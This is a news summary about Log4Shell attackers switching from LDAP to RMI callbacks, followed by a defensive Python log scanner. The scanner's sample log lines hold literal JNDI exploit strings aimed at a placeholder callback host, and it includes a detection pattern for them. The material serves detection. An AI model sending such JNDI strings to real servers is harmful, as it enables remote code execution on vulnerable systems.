
Log4j attackers switch to RMI to inject code and mine Monero
2021-12-16 21:12

Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.

From LDAP to RMI

Most attacks targeting the Log4j "Log4Shell" vulnerability have been through the LDAP service.

The switch to the RMI API seems counter-intuitive at first, considering that this mechanism is subject to additional checks and constraints, but those constraints do not always apply.

Some JVM versions do not enforce stringent policies, and on those, RMI can be an easier channel to achieving RCE than LDAP. Moreover, LDAP requests are now well established as part of the infection chain and are more closely monitored by defenders.

In some cases, Juniper saw both RMI and LDAP services in the same HTTP POST request.

For all actors attempting to abuse the Log4Shell vulnerability, the goal remains the same: sending an exploit string to be processed by the vulnerable Log4j server, leading to code execution on the target.
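The detection side of this is what a defender monitoring for the switch described above actually needs. The following Python is an added example, not code from the article or from Juniper: it scans web-server access-log lines for JNDI lookup strings, records which callback scheme each request names, and flags requests that carry both an LDAP and an RMI lookup, which is the combined form the article says was seen in single POST requests. The log lines, client addresses and the `callback.example` hostname are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample access-log lines in combined-log format (not taken from
# the article). Client addresses are RFC 5737 documentation addresses and the
# callback host is a placeholder, not real attacker infrastructure. The JNDI
# strings appear in the Referer and User-Agent positions, which are fields
# commonly logged by Log4j-backed applications.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2021:20:55:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Dec/2021:20:55:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://callback.example/a}"
203.0.113.9 - - [16/Dec/2021:20:55:03 +0000] "POST /api HTTP/1.1" 200 77 "-" "${jndi:rmi://callback.example/b}"
203.0.113.11 - - [16/Dec/2021:20:55:04 +0000] "POST /api HTTP/1.1" 200 77 "${jndi:ldap://callback.example/c}" "${jndi:rmi://callback.example/d}"
"""

# A literal JNDI lookup prefix followed by a URI scheme, e.g. ${jndi:ldap://...
# The scheme is captured so the detector can report which callback protocol
# each request names rather than just "JNDI seen".
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-z][a-z0-9+.-]*):", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int          # 1-based line number in the scanned log
    client: str           # first field of the log line (client address)
    schemes: List[str]    # sorted, lower-cased JNDI schemes seen on the line


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per log line that contains at least one JNDI lookup."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        schemes = sorted({m.group("scheme").lower() for m in JNDI_LOOKUP.finditer(line)})
        if schemes:
            client = line.split(" ", 1)[0]
            findings.append(Finding(line_no, client, schemes))
    return findings


def classify(schemes: List[str]) -> str:
    """Label a request by the callback protocols its JNDI lookups name."""
    uses_ldap = any(s in ("ldap", "ldaps") for s in schemes)
    uses_rmi = "rmi" in schemes
    if uses_ldap and uses_rmi:
        return "both"          # LDAP and RMI in the same request
    if uses_rmi:
        return "rmi_only"
    if uses_ldap:
        return "ldap_only"
    return "other"


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per category; a shift of mass from ldap_only toward
    rmi_only or both is the behaviour change the article describes."""
    counts = {"ldap_only": 0, "rmi_only": 0, "both": 0, "other": 0}
    for f in findings:
        counts[classify(f.schemes)] += 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} -> {classify(f.schemes)} {f.schemes}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

The matcher is deliberately literal and runs over the whole log line, so it catches the lookup wherever the application happened to log it (URL, Referer, User-Agent). In production the same check should also be applied to request bodies and to URL-decoded header values, since the article notes the combined LDAP-plus-RMI form arrived in POST requests; counting per category over time, as `summarize` does, is what lets a SOC notice the move away from LDAP rather than only tallying JNDI hits.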


News URL

https://www.bleepingcomputer.com/news/security/log4j-attackers-switch-to-rmi-to-inject-code-and-mine-monero/